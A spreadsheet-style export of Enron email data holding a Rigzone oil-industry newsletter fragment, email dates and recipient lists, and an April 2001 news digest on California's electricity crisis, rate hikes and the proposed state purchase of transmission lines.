Feb. 26 	2002 IADC/SPE Drilling Conference and Exhibition  &lt;http://www.rigzone.com/news/event_detail.asp?event_id=37&gt;	Dallas	_x000D_
Feb. 26 	Offshore Oil and Gas Safety Seminars &lt;http://www.rigzone.com/news/event_detail.asp?event_id=214&gt;	Aberdeen	_x000D_
Feb. 27 	Human Resources in Oil &amp; Gas &lt;http://www.rigzone.com/news/event_detail.asp?event_id=194&gt;	Aberdeen	_x000D_
Mar. 10 	AAPG Annual Meeting &lt;http://www.rigzone.com/news/event_detail.asp?event_id=21&gt;	Houston	_x000D_
Mar. 20 	LNG North America &lt;http://www.rigzone.com/news/event_detail.asp?event_id=201&gt;	Houston	_x000D_
Apr. 9 	2002 SPE/ICoTA Coiled Tubing Conference and Exhibition &lt;http://www.rigzone.com/news/event_detail.asp?event_id=41&gt;	Houston	_x000D_
list your conference &lt;http://www.rigzone.com/news/post_event.asp?action=INSERT&gt;	view upcoming events &lt;http://www.rigzone.com/news/event_home.asp&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/email/title_tab_SponsoredBy.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	Horizon Offshore &lt;http://www.horizonoffshore.com&gt;_x000D_
Global Completion Service &lt;http://www.globalcompletion.com&gt;_x000D_
HoverDril &lt;http://www.hoverdril.com&gt;_x000D_
Baker Hughes &lt;http://www.bakerhughes.com/inteq/evaluation/index.htm&gt;_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
promote your company &lt;http://www.rigzone.com/advertise/&gt;	_x000D_
_x000D_
  &lt;http://www.rigzone.com/images/email/title_tab_InStore.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	 &lt;http://www.rigzone.com/store/product.asp?p_id=586&gt;_x000D_
Well Completion and Servicing &lt;http://www.rigzone.com/store/product.asp?p_id=586&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;_x000D_
 &lt;http://www.rigzone.com/store/product.asp?p_id=70&gt;_x000D_
Mobile Drilling Units of the World CD-ROM &lt;http://www.rigzone.com/store/product.asp?p_id=70&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
 &lt;http://www.rigzone.com/store/product.asp?p_id=587&gt;_x000D_
Drilling Data Handbook, 7th Ed. &lt;http://www.rigzone.com/store/product.asp?p_id=587&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
more products &lt;http://www.rigzone.com/store/&gt;	_x000D_
_x000D_
 &lt;http://www.energy-prospectus.com/&gt;_x000D_
_x000D_
  &lt;http://www.rigzone.com/images/email/title_tab_RZMarket.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	featured equipment:	_x000D_
National 1320-UE &lt;http://www.rigzone.com/market/surplus_listing.asp?eq_id=383&gt;	_x000D_
 &lt;http://www.rigzone.com/market/surplus_listing.asp?eq_id=383&gt;_x000D_
	_x000D_
Wartsila Generator Sets &lt;http://www.rigzone.com/market/surplus_listing.asp?eq_id=382&gt;	_x000D_
 &lt;http://www.rigzone.com/market/surplus_listing.asp?eq_id=382&gt;_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
more equipment &lt;http://www.rigzone.com/market/&gt;	_x000D_
_x000D_
  &lt;http://www.rigzone.com/images/email/title_tab_RZCareerCenter.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	featured jobs: 	_x000D_
-	Mechanic &lt;http://www.rigzone.com/jobs/job_posting.asp?p_id=978&gt;	_x000D_
-	Pipeline Technical Specialist - Advisor &lt;http://www.rigzone.com/jobs/job_posting.asp?p_id=965&gt;	_x000D_
-	Wellhead-Christmas Tree Specialist &lt;http://www.rigzone.com/jobs/job_posting.asp?p_id=966&gt;	_x000D_
more hot jobs &gt;&gt; &lt;http://www.rigzone.com/jobs/hot_jobs.asp&gt;	_x000D_
featured candidates: 	_x000D_
-	Drilling Engineer &lt;http://www.rigzone.com/jobs/resume.asp?r_id=10000&gt;	_x000D_
-	Production &amp; Workover Engineer &lt;http://www.rigzone.com/jobs/resume.asp?r_id=10004&gt;	_x000D_
-	Drilling Manager, Senior Drilling Engineer &lt;http://www.rigzone.com/jobs/resume.asp?r_id=8448&gt;	_x000D_
search for candidates &gt;&gt; &lt;http://www.rigz! one.com/jobs/search_resume.asp&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
  &lt;http://www.rigzone.com/images/email/title_tab_RigUtil.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	Drillships:	_x000D_
To 5000': 	50.0%	(7/14)	_x000D_
+5000': 	96.0%	(24/25)	_x000D_
Semisubs:	_x000D_
2nd Gen: 	67.1%	(49/73)	_x000D_
3rd Gen: 	86.0%	(43/50)	_x000D_
4th Gen: 	100.0%	(38/38)	_x000D_
5th Gen: 	100.0%	(7/7)	_x000D_
Jackups:	_x000D_
To 200': 	56.7%	(38/67)	_x000D_
200' MC: 	50.0%	(12/24)	_x000D_
200' MS: 	14.3%	(3/21)	_x000D_
300' IC: ! 	86.5%	(83/96)	_x000D_
+300' IC: 	90.7%	(49/54)	_x000D_
Severe Env.: 	81.0%	(17/21)	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
view complete utilization report &lt;http://www.rigzone.com/data/utilization_trends.asp&gt;	_x000D_
_x000D_
  &lt;http://www.rigzone.com/images/email/title_tab_OilPrices.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	Light Crude Oil: 	$18.10/BBL _x000D_
(-3.83%)	_x000D_
Brent Crude Oil: 	$18.42/BBL _x000D_
(-5.44%)	_x000D_
Natural Gas: 	$2.27/MMBtu _x000D_
(-5.81%)	_x000D_
Unleaded Gasoline: 	$0.53/gal _x000D_
(-3.64%)	_x000D_
prices from: 	1/17/2002	_x000D_
change since: 	1/16/2002	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
Promotional Opportunities_x000D_
Become a Sponsor, feature your job opening or, advertise your upcoming industry conference. Click here &lt;http://www.rigzone.com/advertise/&gt; for more information, send your press release to info@rigzone.com &lt;mailto:info@rigzone.com&gt; or call us at 281-345-4040. _x000D_
_x000D_
Member Services_x000D_
If you no longer wish to receive this newsletter, you may unsubscribe by clicking here &lt;http://www.rigzone.com/daily_unsubscribe.asp&gt; or by logging in to Rigzone and updating your profile. You can also change the format you receive (HTML or Text) and your email address by logging in and updating your account. Click here to log in &lt;http://www.rigzone.com/login.asp?returnURL=/member_register.asp&gt;. _x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	</t>
  </si>
  <si>
    <t>Mon, 10 May 1999 05:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Exxon</t>
  </si>
  <si>
    <t>not a thing yet</t>
  </si>
  <si>
    <t>Tue, 3 Jul 2001 08:06:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'keegan.farrell@enron.com', 'b..hearn@enron.com', 'genia.fitzgerald@enron.com', 'h..moore@enron.com', 'steve.van@enron.com', 'carlos.sole@enron.com', 'lou.stoler@enron.com', 'carolyn.george@enron.com', 'stephanie.panus@enron.com', 'mark.greenberg@enron.com', 'stephanie.truss@enron.com', 'gerald.nemec@enron.com', 'mark.powell@enron.com', 'sara.shackleton@enron.com', 'e..crady@enron.com', 'janette.elbertson@enron.com', 'kathleen.carnahan@enron.com', 'mary.ogden@enron.com', 'suzanne.adams@enron.com', 'samantha.boyd@enron.com', 'martha.keesler@enron.com', 'mary.cook@enron.com', 'j..heinitz@enron.com', 'm..collins@enron.com', 'peter.del@enron.com', 'robert.shamblin@enron.com', 'j..simmons@enron.com', 'cheryl.lindeman@enron.com', 'roseann.engeldorf@enron.com', 'r..guinn@enron.com', 'theresa.zucha@enron.com', 'susan.bailey@enron.com', 'marcus.nettelton@enron.com', 'sheila.tweed@enron.com', 'coralina.rivera@enron.com', 'diane.goode@enron.com', 'lance.schuler@enron.com', 'r..rogers@enron.com', 'a..robison@enron.com', 'legal &lt;.taylor@enron.com&gt;', 'nita.garcia@enron.com', 'g..bushman@enron.com', 'wayne.gresham@enron.com', 'vanessa.griffin@enron.com', 'paula.craft@enron.com', 'kay.mann@enron.com', 'connie.castillo@enron.com', 'c..koehler@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'alan.aronowitz@enron.com', 'matt.maxwell@enron.com', 'h..george@enron.com', 'leslie.hansen@enron.com', 'pinto.leite@enron.com', 'randel.young@enron.com', 'nancy.corbet@enron.com', 'sarah.bruck@enron.com', 'becky.spencer@enron.com', 'barton.clark@enron.com', 'laurie.mayer@enron.com', 'e..haedicke@enron.com', 'gail.brownfeld@enron.com', 'angela.davis@enron.com', 'maryhelen.martinez@enron.com', 'kay.young@enron.com', 'debra.perlingiere@enron.com', 'e..dickson@enron.com', 'reginald.shanks@enron.com', 'nony.flores@enron.com', 'holly.keiser@enron.com', 'cheryl.nelson@enron.com', 'michelle.cash@enron.com', 'lisa.mellencamp@enron.com', 'dominic.carolan@enron.com', 'travis.mccullough@enron.com', 'claudia.meraz@enron.com', 'brent.hendry@enron.com', 'eddy.daniels@enron.com', 't..hodge@enron.com', 'deb.korkmas@enron.com', 'andrew.edison@enron.com', 'twanda.sweet@enron.com', 'martha.braddy@enron.com', 'elizabeth.sager@enron.com', 'n..gray@enron.com', 'john.viverito@enron.com', 'esmeralda.gonzalez@enron.com', 'dan.lyons@enron.com', 'carol.st.@enron.com', 'michelle.blaine@enron.com', 'tana.jones@enron.com', 'margaret.doucette@enron.com', 'robert.bruce@enron.com', 'w..haas@enron.com'})</t>
  </si>
  <si>
    <t>U.S. Government Programs</t>
  </si>
  <si>
    <t xml:space="preserve">Please review attached memo and respond by next Tuesday, July 10.  Thanks, Deb_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 03:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sgovenar@govadv.com', 'alex.parsons@enron.com', 'janet.butler@enron.com', 'tom.briggs@enron.com', 'mark.schroeder@enron.com', 'linda.robertson@enron.com', 'markus.fiala@enron.com', 'peter.styles@enron.com', 'stella.chan@enron.com', 'syamane@marathon-com.com', 'karen.denne@enron.com', 'michael.brown@enron.com', "nicholas.o'day@enron.com", 'ken@kdscommunications.com', 'dcasse@whwg.com', 'hgovenar@govadv.com', 'rob.bradley@enron.com', 'lipsen@cisco.com', 'jeannie.mandelker@enron.com', 'mona.petrochko@enron.com', 'lora.sullivan@enron.com', 'lysa.akin@enron.com', 'mike.dahlke@enron.com', 'shirley.hudler@enron.com', 'richard.shapiro@enron.com', 'susan.mara@enron.com', 'rlichtenstein@marathon-com.com', 'peggy.mahoney@enron.com', 'jennifer.thome@enron.com', 'joseph.alamo@enron.com', 'steven.kean@enron.com', 'kathleen.sullivan@enron.com', 'mike.roan@enron.com', 'shelley.corman@enron.com', 'bryan.seyfried@enron.com', 'filuntz@aol.com', 'andrew.morrison@enron.com', 'john.sherriff@enron.com', 'jkradin@marathon-com.com', 'janel.guerrero@enron.com', 'elizabeth.linnell@enron.com', 'margaret.carson@enron.com', 'bhansen@lhom.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'sandra.mccubbin@enron.com', 'mark.palmer@enron.com', 'ann.schmidt@enron.com', 'john.neslage@enron.com', 'dg27@pacbell.net', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t>Please see the following articles:_x000D_
_x000D_
Houston Chron, Sun, 4/1:  "Corporate greed isn't to blame for energy crisis _x000D_
in California"_x000D_
_x000D_
Sac Bee, Mon, 4/2:  "Report: Potential rate hike included in California power _x000D_
talks"_x000D_
_x000D_
San Diego Union, Sun, 4/1:  "Davis softens on rate hikes; Democrats fear _x000D_
backlash"_x000D_
_x000D_
San Diego Union, Sun, 4/1:  "Some question value of transmission lines"_x000D_
_x000D_
LA Times, Mon, 4/2: "This Summer, Power-Hungry U.S. May Feel West's Pain"_x000D_
_x000D_
LA Times, Mon, 4/2:  "State, Edison Discussed Pact to Pay off Firm's Huge _x000D_
Debt"_x000D_
_x000D_
LA Times, Mon, 4/2:  "Vegas lights Undimmed"_x000D_
_x000D_
SF Chron, Mon, 4/2:  "Power Crisis Batters Budget _x000D_
Stock slide, rate increases erode state's revenue "_x000D_
_x000D_
SF Chron, Sun, 4/1:  "Davis Blames Crisis On State Republicans _x000D_
But Democratic controller points at governor "_x000D_
_x000D_
SF Chron, Sun, 4/1:  "Rate Increases May Be Just Beginning _x000D_
Unanswered questions now may mean higher bills soon "_x000D_
_x000D_
SF Chron, Sun, 4/1:  "Energy Department Rethinking Clinton Appliance _x000D_
Efficiency Rules "_x000D_
_x000D_
SF Chron, Mon, 4/2:  "Hydrogen Powers Energy Hopes _x000D_
Experts say it may be the fuel of the future "_x000D_
_x000D_
Mercury News, Sun, 4/1:  "Consumers bemoan formula for power-rate hikes"_x000D_
_x000D_
Mercury News, Mon, 4/2:  "High energy prices place firms higher in Fortune _x000D_
500 ranks"_x000D_
_x000D_
Mercury News, Mon, 4/2:  "As energy policy lurches, is Gov. Davis in charge?" _x000D_
     (Editorial)_x000D_
_x000D_
Orange County, Mon, 4/2:  "Businesses battle the blackouts"     (Commentary)_x000D_
_x000D_
Individual.com, Mon, 4/2:  "California ISO Declares Stage Two Electrical _x000D_
Emergency; _x000D_
Continued Conservation Urged as Power Supplies Remain Limited"_x000D_
_x000D_
Individual.com, Mon, 4/2:  "[B] PG&amp;E says it will take $4.1 bln charge on _x000D_
uncollected _x000D_
power costs (Wrap)"_x000D_
------------------------------------------------------------------------------_x000D_
---------------------------------------------------_x000D_
OUTLOOK_x000D_
Outlook_x000D_
Corporate greed isn't to blame for energy crisis in California_x000D_
JERRY TAYLOR, PETER VANDOREN_x000D_
_x000D_
04/01/2001_x000D_
Houston Chronicle_x000D_
4 STAR_x000D_
4_x000D_
(Copyright 2001)_x000D_
_x000D_
TO hear California's politicians tell it, heartless power- generating firms _x000D_
are the cause of the high price of West Coast electricity. _x000D_
Deregulation, the populists claim, allowed them to sell electricity at _x000D_
astronomical prices in an utterly dysfunctional wholesale market. The Federal _x000D_
Energy Regulatory Commission has now joined the witch hunt, ordering power _x000D_
generators to refund the state of California $124 million for "overcharges" _x000D_
during the power emergencies in January and February. The only problem with _x000D_
price controls, we're told, is that they're not more aggressively applied._x000D_
Have we learned nothing from economic history? _x000D_
The commission maintains that it cost 27 cents on average to produce a _x000D_
kilowatt hour of electricity during peak demand periods last January. _x000D_
California regulators, however, report that they paid an average of 28 cents _x000D_
for that power on the daily spot market. During February, wholesale natural _x000D_
gas prices exploded, resulting in production costs of 43 cents per kilowatt _x000D_
hour. Unfortunately, no published data exist to discern what that power _x000D_
actually sold for. But given the size of the commission-ordered rebates and _x000D_
the extent of the markups observed in previous months, it's unlikely that _x000D_
wholesale prices were more than a few cents higher on average than production _x000D_
costs. Nonetheless, because the commission's mission is to prohibit "unjust _x000D_
and unreasonable" wholesale prices, the commission wants the generators to _x000D_
give back the difference charged during the power emergencies earlier this _x000D_
year. _x000D_
The economic populists have seized on those commission orders as proof that _x000D_
they're being robbed blind. But hold on a minute: The commission's data _x000D_
clearly show that high wholesale electricity prices (which hovered around 3 _x000D_
cents per kilowatt hour before the crisis hit last year) are primarily the _x000D_
result of higher production costs, not corporate greed. To be sure, industry _x000D_
analysts believe that actual production costs during power emergencies are _x000D_
far higher than the commission believes, but at least the commission has _x000D_
recognized that input prices explain most of the spike. The upshot is that _x000D_
higher production costs would have sent wholesale electricity prices through _x000D_
the roof even if the Legislature had not "deregulated" its electricity market _x000D_
in 1996. _x000D_
The commission also implicitly concedes - rightly - that the highest cost _x000D_
source of supply needed to meet demand is the legitimate price for all power _x000D_
sold in the state. For instance, the cost of producing a kilowatt hour of _x000D_
nuclear, coal, or renewable-fired electricity ranges from 2 cents to 6 cents, _x000D_
but the commission does not propose to require those generators to price at _x000D_
cost. _x000D_
Given the overall shortage of electricity in the Western region, the _x000D_
commission grants those power generators the right to charge what the market _x000D_
will bear. _x000D_
But wait: Why is it OK with the commission if some generators charge what the _x000D_
market will bear, but not OK for other generators to do likewise? Top _x000D_
electricity economists spanning the ideological spectrum agree that power _x000D_
supplies are so tight in the West that most natural gas-fired generators can _x000D_
charge more than their costs and still find willing buyers. Not only is this _x000D_
not a crime were it to occur in any other market, it's necessary if _x000D_
electricity is to be allocated to those who need it the most. _x000D_
For the sake of argument, let's assume that about a nickel out of each _x000D_
kilowatt hour sold during the peak demand periods in January represents _x000D_
"profiteering." If so, don't blame the free market . . . it doesn't exist. In _x000D_
California, generators can charge whatever they want during a crisis without _x000D_
fear that the prices they name will reduce sales because the state insists _x000D_
upon maintaining retail price controls. This is called a "dream scenario." _x000D_
Without those rate caps, generators would find that high prices reduce sales, _x000D_
providing a disincentive against charging the moon. The upshot is that retail _x000D_
price controls are themselves primarily responsible for whatever mischief _x000D_
exists. _x000D_
Still, we're arguing about a nickel out of a bill of 28-45 cents per kilowatt _x000D_
hour. That's a lot of to-do about relatively nothing. Drum all those alleged _x000D_
excess profits out of the market and we're still in a world in which _x000D_
California ratepayers are getting one heck of a free ride. Even with the 40 _x000D_
percent rate hike passed last week, California ratepayers are still paying _x000D_
only one-third to one-fifth the cost of the power they are consuming. _x000D_
You don't need a Ph.D. in economics to understand that subsidies like that _x000D_
will inevitably result in excessive consumption, scarcity and blackouts. _x000D_
Those who think that denying the laws of supply and demand are the best way _x000D_
out of this mess will soon be pondering such thoughts in the dark._x000D_
_x000D_
Drawing: (p. 1) _x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
------------------------------------------------------------------------------_x000D_
-------------------------------------------------------------------_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Report: Potential rate hike included in California power talks_x000D_
LOS ANGELES (AP) -- The state's negotiations to buy power lines from ailing _x000D_
Southern California Edison included a draft proposal that could mean another _x000D_
rate hike for customers, the Los Angeles Times reported Monday. _x000D_
The newspaper said it obtained a 40-page draft memorandum of understanding, _x000D_
dated last week, that among other things could obligate Edison customers to _x000D_
help pay the utility's massive debt through a "dedicated rate component" -- _x000D_
potentially a rate hike -- even if no power line deal is reached. _x000D_
The component, which wasn't specified, wouldn't show up in bills for two _x000D_
years, according to the draft. _x000D_
The document was dated Tuesday -- the same day that the state Public _x000D_
Utilities Commission approved record rate increases of up to 42 percent for _x000D_
Edison and 46 percent for PG&amp;E. _x000D_
The PUC was scheduled to meet Monday to determine how best to hear from as _x000D_
many different groups as possible before implementing the increase. _x000D_
A spokesman for Gov. Gray Davis said Sunday that the draft memorandum -- one _x000D_
of several floated in the state's ongoing, nearly two-month-old talks with _x000D_
Edison -- already is obsolete. _x000D_
"This draft is ancient history," Steve Maviglio said. "We have moved beyond _x000D_
that, and continue to make progress and hope to be able to make an _x000D_
announcement shortly." He did not provide other details. _x000D_
On Friday, Edison officials described as "very active" talks with the _x000D_
governor's office over the sale of its transmission lines to give the _x000D_
struggling utility a cash infusion. But SCE chief financial officer Ted _x000D_
Craver said a deal was not imminent. _x000D_
In addition to Edison, Davis wants to buy electrical lines from Pacific Gas &amp; _x000D_
Electric Co. and San Diego Gas &amp; Electric Co. for a combined total of about _x000D_
$7 billion. _x000D_
Edison and PG&amp;E say they've lost nearly $14 billion since June to high _x000D_
wholesale prices. _x000D_
Talks between the state and PG&amp;E are awaiting the outcome of the Edison deal, _x000D_
PG&amp;E spokesman John Nelson said Sunday. _x000D_
Meanwhile, the Bush administration on Sunday reiterated its opposition to _x000D_
price controls as a method of halting soaring energy costs, including _x000D_
California's. _x000D_
"Our view is that price caps on energy create shortages. They created the gas _x000D_
lines of the 1970s," U.S. Energy Secretary Spencer Abraham said on ABC's _x000D_
"This Week." _x000D_
"If we did them in California, for instance, where this call has gone out, _x000D_
we'd have more blackouts this summer, they'd last longer, and they'd go on _x000D_
into the future," Abraham said. _x000D_
As for helping the state, "we're doing the most that we can," Abraham said. _x000D_
"But as I've said, we don't have a generator in the basement of the _x000D_
Department of Energy where I can automatically send electricity, whether it's _x000D_
to California or another part of the country." _x000D_
------------------------------------------------------------------------------_x000D_
----_x000D_
_x000D_
_x000D_
_x000D_
Davis softens on rate hikes; Democrats fear backlash _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
By John Marelius?_x000D_
UNION-TRIBUNE STAFF WRITER _x000D_
April 1, 2001 _x000D_
ANAHEIM -- Gov. Gray Davis all but abandoned his once-adamant opposition to _x000D_
electricity rate increases yesterday as angst over the potential political _x000D_
fallout from the energy crisis dominated what had been planned as a weekend _x000D_
of celebrating Democratic electoral gains in California. _x000D_
In a speech to the California Democratic Party Convention, the governor _x000D_
sketched the outlines of an alternative he is expected to propose to the rate _x000D_
increases of up to 46 percent approved last week by the state Public _x000D_
Utilities Commission. _x000D_
"If a rate increase becomes absolutely necessary to keep our lights on and _x000D_
keep our economy strong, you can be sure of one thing from this governor: _x000D_
I'll fight to protect those least able to pay, reward those who conserve the _x000D_
most and motivate those who are the biggest guzzlers to cut back," Davis _x000D_
said. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Some question value of transmission lines _x000D_
? _x000D_
_x000D_
_x000D_
_x000D_
Meanwhile, state Controller Kathleen Connell pointedly decried a "delaying _x000D_
and incremental" approach to the energy crisis and warned of a voter backlash _x000D_
against Democrats in next year's elections. _x000D_
"Just ask President Jimmy Carter what happens when you stall and you don't _x000D_
solve the gas-line problem," Connell said. "We don't want to have that happen _x000D_
to California Democrats." _x000D_
Davis, who has a history of animosity with Connell, shrugged off the unstated _x000D_
but obvious critique of his handling of the crisis. _x000D_
"Everyone's entitled to their point of view, but I believe that we've moved _x000D_
at warp speed to address this problem," he said. "I'm pleased that we've been _x000D_
able to keep the lights on most days. .?.?. Maybe if she's not happy with _x000D_
that, she can run for governor next time." _x000D_
One analyst speculated that may be exactly what Connell has in mind. She is _x000D_
running for mayor of Los Angeles but is not expected to be a major factor, _x000D_
and term limits prevent her from seeking a third term as controller next _x000D_
year. _x000D_
"It's the opening salvo in the 2002 Democratic primary campaign," said Sherry _x000D_
Bebitch Jeffe, a political scientist at the University of Southern _x000D_
California. "I don't know how else to interpret it." _x000D_
With the election of President Bush and Republicans in control of Congress, _x000D_
the Democratic Party finds itself in its weakest position nationally since _x000D_
the Eisenhower administration. Yet in California, Democrats are in their _x000D_
strongest position in decades as they hold all but one statewide office and _x000D_
wide majorities in the state congressional delegation and both houses of the _x000D_
Legislature. _x000D_
A succession of convention speakers -- U.S. Sen. Barbara Boxer, House _x000D_
Minority Leader Dick Gephardt of Missouri and Democratic National Committee _x000D_
Chairman Terry McAuliffe -- excoriated Bush's assault on Democratic _x000D_
environmental and worker safety regulations and held up the California _x000D_
Democratic Party as a national model for Democratic electoral success. _x000D_
"If every Democratic Party in the country did what California did for House _x000D_
Democrats, I would have the (House speaker's) gavel today," Gephardt said. _x000D_
For the first time, Democrats are holding their state convention in Orange _x000D_
County, a Republican stronghold where Democrats have been making solid _x000D_
inroads because of the steady influx of immigrants from Asia and Latin _x000D_
America. _x000D_
"This ain't your grandfather's Orange County," Davis crowed. "You know, _x000D_
Orange County has a Republican past, but it has a Democratic future." _x000D_
Such self-congratulation was tempered by the awareness that because Democrats _x000D_
hold such a position of dominance in California, voters will expect them to _x000D_
solve the electricity problem even as Democrats continue to blame it on the _x000D_
deregulation policies of former Republican Gov. Pete Wilson. _x000D_
"There will be no excuses for Democrats in this state because we dominate _x000D_
state government," Connell said. _x000D_
She warned that continued "finger-pointing" would not solve the problem. _x000D_
Other speakers continued to hammer away at Wilson as some of the walls in the _x000D_
Anaheim Convention Center bore posters reading, "Wilson did it." And then _x000D_
there was the message inside the fortune cookies: "Energy fiasco. DNA proves _x000D_
Wilson at crime scene." _x000D_
"What the voters have to understand is that we inherited this crisis," said _x000D_
California Democratic Party Chairman Art Torres, who was elected to a second _x000D_
four-year term yesterday. "Now we've got to deal with it, and we should be _x000D_
held accountable on how we deal with it." _x000D_
Davis remains a strong favorite to win re-election next year, but his _x000D_
once-robust popularity apparently has taken a major hit in recent weeks, _x000D_
especially when blackouts began rolling across the state. _x000D_
"There are people polling and they show enormous deterioration in Davis' _x000D_
numbers, and it looks like he's got some real political problems," said _x000D_
Democratic strategist Bill Carrick. "But ultimately, he's going to be judged _x000D_
on how he manages the crisis and can he get a solution on this before next _x000D_
year that makes some sense to people." _x000D_
For months Davis said electricity rate increases were out of the question and _x000D_
recently claimed he could have solved the problem in 20 minutes if he had _x000D_
been willing to entertain them. _x000D_
When the PUC voted its increase for Pacific Gas and Electric Co. and Southern _x000D_
California Edison Co. on Tuesday, Davis called the action premature, but did _x000D_
not offer an alternative. Yesterday, he said he was consulting with financial _x000D_
analysts and would propose a rate plan before the end of the 30-day period _x000D_
before the action of the independent commission becomes final. _x000D_
"I will have a fuller statement within the next two weeks, at which time I _x000D_
will speak to what if any rate hike I think is appropriate and how tiered _x000D_
pricing should be implemented," the governor said. _x000D_
Davis lashed back at Republican legislators who have escalated their _x000D_
criticism of his handling of the crisis. He blamed the GOP for the ill-fated _x000D_
1996 deregulation without mentioning that the plan cleared the Legislature _x000D_
with unanimous Democratic support. _x000D_
"The Republicans who were so enamored with deregulation just five years ago _x000D_
have become even more enamored with criticizing me as I try to clean up their _x000D_
mess," Davis said. "May I remind our Republican friends that this _x000D_
deregulation disaster was authored by a Republican legislator, passed by a _x000D_
Republican Assembly, signed into law by a Republican governor and implemented _x000D_
with undue haste by a Republican PUC."_x000D_
------------------------------------------------------------------------------_x000D_
----_x000D_
_x000D_
_x000D_
Some question value of transmission lines _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
By Jeff McDonald?_x000D_
UNION-TRIBUNE STAFF WRITER _x000D_
April 1, 2001 _x000D_
Transmission lines have been upgraded. Poles are taller and sturdier. _x000D_
Electricity is shuttled farther and faster than ever before. _x000D_
But like internal combustion engines or indoor plumbing, not much has changed _x000D_
over the past 100 years in the fundamental design of the distribution network _x000D_
that pushes power across North America. _x000D_
The electric grid, a vast collection of wires and switches, has served _x000D_
millions of homes and businesses since the late 19th century. The grid has _x000D_
been expanded again and again, decade after decade. _x000D_
Now, with Gov. Gray Davis negotiating to buy huge sections of the grid owned _x000D_
by three cash-hungry California utilities, questions are being raised about _x000D_
the long-term value of such a dated delivery system. _x000D_
Is the web of power lines a key link in the supply chain whose worth will _x000D_
climb higher and higher as demand for electricity grows? Or will looming _x000D_
technology render the grid obsolete even before the state can pay off the _x000D_
bonds it issues to buy the system? _x000D_
"The usefulness of the grid is still intact -- it does work," said Mark _x000D_
McLaughlin, a researcher with the Alternative Energy Institute, a Tahoe _x000D_
City-based group that promotes renewable power sources. _x000D_
But "it will become less important over time -- 10, 15 years," he said. "As _x000D_
for being completely reliant on it, that is changing now and will continue to _x000D_
change at an ever-increasing pace." _x000D_
Technological advances already are redefining traditional electricity _x000D_
delivery. _x000D_
With blackouts crippling businesses across the state -- and additional _x000D_
outages forecast for this summer -- more and more companies are investing in _x000D_
so-called distributed generation, a broad term applied to any number of _x000D_
devices that can make power on-site. _x000D_
Increasingly popular products such as microturbines, cogeneration plants, _x000D_
photovoltaic systems and residential fuel cells allow consumers to limit _x000D_
their reliance on utility companies such as San Diego Gas and Electric. _x000D_
"This (power) crisis has generated a huge amount of interest in the product," _x000D_
said Mark Kuntz of Capstone, a San Fernando Valley-based company that markets _x000D_
30-and 60-kilowatt microturbines. _x000D_
"We're in the process of responding to that interest and turning it into _x000D_
orders." _x000D_
The abundance of alternatives for businesses and homeowners has propelled a _x000D_
new debate: what to do with the surplus power produced by distributed _x000D_
generation systems. _x000D_
Investors are banking that the electric grid will remain hugely valuable _x000D_
because it can move energy in any direction. _x000D_
"We are building a company around our bullishness on the grid," said Fred _x000D_
Buckman, chairman of Trans-Elect Inc., a private Washington, D.C.-based _x000D_
company that plans to spend $15 billion acquiring transmission lines. _x000D_
"The deployment of smaller distributed generation systems will reduce the _x000D_
rate at which we have to grow the transmission system, but we don't believe _x000D_
it will replace the grid." _x000D_
Trans-Elect bid up to $5 billion for the lines owned by Southern California _x000D_
Edison, Pacific Gas and Electric, and SDG&amp;E. But that offer was pushed aside _x000D_
by utility company executives when it became clear that Davis wanted the grid _x000D_
for the state of California. _x000D_
More important to utilities, however, may be the eventual sales price. _x000D_
Edison agreed in principle to sell its share of transmission lines to the _x000D_
state for $2.76 billion. But details of that proposed deal -- announced in _x000D_
February -- remain to be worked out. _x000D_
In the meantime, lawmakers are growing anxious about continuing delays. Some _x000D_
legislators say Davis should rethink buying the grid and instead consider _x000D_
acquiring the utilities' hydroelectric networks. _x000D_
